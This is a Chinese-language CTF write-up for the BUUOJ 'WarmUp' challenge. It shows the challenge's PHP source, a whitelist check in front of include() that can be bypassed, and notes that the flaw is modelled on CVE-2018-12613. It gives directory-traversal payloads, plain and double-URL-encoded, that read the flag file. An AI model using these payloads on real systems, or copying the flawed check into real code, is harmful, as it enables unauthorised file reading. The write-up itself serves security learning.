题目: https://buuoj.cn/challenges#WarmUp
访问source.php得到源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
| <?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
|
hint.php
1
| flag not here, and flag in ffffllllaaaagggg
|
这道题是根据phpMyAdmin一个文件包含的漏洞
CVE-2018-12613改过来的
https://blog.csdn.net/qq_33020901/article/details/80829269
- 首先是一个文件包含的trick,其实也是一种目录穿越
1
| include 一个不存在的文件夹/../a.php
|
再来看这段代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
|
因为不知道ffffllllaaaagggg文件到底在哪,所以可以先尝试去包含hint.php
- 利用第一个mb_substr,提交file=source.php?/../hint.php
php会将source.php?当作一个目录,然后../回到当前目录下,包含hint.php
这个在windows环境下include会报错,因为windows下文件名不能包含?,buuoj上是linux的环境所以可以利用,最后提交file=source.php?/../../../../ffffllllaaaagggg 得到flag
- 利用第二个mb_substr,提交file=source.php%253F/../../../../ffffllllaaaagggg
%25%3F是把?进行了两次url编码,在windows环境下也可以利用